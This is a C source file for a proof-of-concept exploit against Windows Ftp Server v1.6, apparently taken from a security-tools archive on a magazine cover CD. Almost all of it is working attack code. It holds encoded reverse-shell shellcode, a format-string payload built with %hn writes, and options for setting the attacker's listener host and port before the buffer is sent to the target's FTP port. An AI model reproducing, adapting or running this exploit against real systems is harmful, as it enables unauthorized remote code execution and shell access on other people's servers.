home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / winftp / windowsftpserver.c < prev   
C/C++ Source or Header  |  2005-02-12  |  5KB  |  138 lines
  1. /*
  2.  
  3. date:           12 janv 2004
  4. subject:        PoC exploit for Windows Ftp Server v1.6
  5. vendor:         http://srv.nease.net
  6. credits:        Peter Winter-Smith for the bug discovery
  7. shellcode:      reverse shell (~ 200 bytes)
  8. notes:          universal (doesn't rely on NT version), 2nd version of this exploit
  9. greets:         rosecurity team
  10. author:         mandragore, sploiting@mandragore.solidshells.com
  11.  
  12. */
  13.  
  14. #include <stdio.h>
  15. #include <stdlib.h>
  16. #include <sys/types.h>
  17. #include <sys/socket.h>
  18. #include <netinet/in.h>
  19. #include <arpa/inet.h>
  20. #include <unistd.h>
  21. #include <netdb.h>
  22. #include <fcntl.h>
  23. #include <unistd.h>
  24.  
  25. unsigned char sc[]={
  26. // some padding
  27. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  28. // restore patched code in MFC42.DLL so it doesn't crash yet
  29. 0xBF,0x2B,0x38,0x40,0x5F,0x66,0xB8,0x53,0x8B,0x66,0xAB,0x47,0x66,0xB8,0x40,0xB1,0x66,0xAB,
  30. // overoptimised reverse shell relying on offsets in the WinFTPServer.exe's IAT
  31. 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB7,0x80,0x36,0x96,0x46,0xE2,0xFA,
  32. 0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x1A,0x06,0xD7,
  33. 0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0x06,0x06,
  34. 0xD7,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
  35. 0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
  36. 0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0x14,0x1D,0x52,0xFC,0x86,
  37. 0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
  38. 0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
  39. 0xAA,0xB2,0x50,0x91,0xD2,0xF0,0x51,0xD1,0xBA,0x97,0x97,0x1F,0xC9,0xAE,0x1F,0xC9,
  40. 0xAA,0x1F,0xC9,0xD6,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,
  41. 0xF5,0xFB,0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,
  42. 0xC6,0xE4,0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,
  43. 0x9A,0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46};
  44.  
  45. void usage(char *argv0) {
  46.         printf("usage: %s -d <ip_dest> [options]\n",argv0);
  47.         printf("options:\n");
  48.         printf(" -h ip_host for the reversed shell (default 127.0.0.1)\n");
  49.         printf(" -p port for the reversed shell (default 80)\n\n");
  50.         exit(1);
  51. }
  52.  
  53. int main(int argc, char **argv) {
  54.         struct sockaddr_in saddr;
  55.         #define port 21
  56.         int target=0, lhost=0x0100007f;
  57.         int lport=80;
  58.         int where=0x5f40382b;
  59.         int val1=0xc283, val2=0xe2ff;
  60.         int delta=0x11eeca8-0x11ee96c;
  61.         char *buff;
  62.         int s, ret, i;
  63.  
  64.         printf("[%%] winftpserv v1.6 sploit by mandragore (v2)\n");
  65.  
  66.         if (argc<2) {
  67.                 usage(argv[0]);
  68.         }
  69.  
  70.         while((i = getopt(argc, argv, "d:h:p:"))!= EOF) {
  71.                 switch (i) {
  72.                 case 'd':
  73.                         target=inet_addr(optarg);
  74.                         break;
  75.                 case 'h':
  76.                         lhost=inet_addr(optarg);
  77.                         break;
  78.                 case 'p':
  79.                         lport=atoi(optarg);
  80.                         break;
  81.                 default:
  82.                         usage(argv[0]);
  83.                         break;
  84.                 }
  85.         }
  86.  
  87.         if ((target==-1) || (lhost==-1))
  88.                 usage(argv[0]);
  89.  
  90.         printf("[.] if working you'll have a shell on %s:%d .\n",inet_ntoa(*(struct in_addr *)&lhost),lport);
  91.         printf("[.] launching attack on %s..\n",inet_ntoa(*(struct in_addr *)&target));
  92.  
  93.         lport=lport ^ 0x9696;
  94.         lport=(lport & 0xff) << 8 | lport >>8;
  95.         memcpy(sc+17+18+0x5a,&lport,2);
  96.  
  97.         lhost=lhost ^ 0x96969696;
  98.         memcpy(sc+17+18+0x53,&lhost,4);
  99.  
  100.         buff=(char *)malloc(4096);
  101.         bzero(buff,4096);
  102.  
  103.         memcpy(buff,&where,4);
  104.         strcat(buff,"xyzy");
  105.         where+=3;
  106.         memcpy(buff+8,&where,4);
  107.  
  108.         strncat(buff,sc,strlen(sc));
  109.  
  110.         for (i=0;i<(delta-1)/4;i++) {
  111.                 strcat(buff,"%08x");
  112.         }
  113.  
  114.         sprintf(buff,"%s%%0%dx%%hn%%0%dx%%hn\r\n",buff,val1-strlen(sc)-((delta-1)/4)*8-4*3-7,val2-val1);
  115.  
  116.         saddr.sin_family = AF_INET;
  117.         saddr.sin_addr.s_addr = target;
  118.         saddr.sin_port = htons(port);
  119.  
  120.         s=socket(2,1,6);
  121.  
  122.         ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
  123.         if (ret==-1) {
  124.                 perror("[-] connect()");
  125.                 exit(1);
  126.         }
  127.  
  128.         send(s,buff,strlen(buff),0);
  129.  
  130.         recv(s,buff,1024,0);
  131.  
  132.         close(s);
  133.  
  134.         printf("[+] done.\n");
  135.  
  136.         exit(0);
  137. }
  138.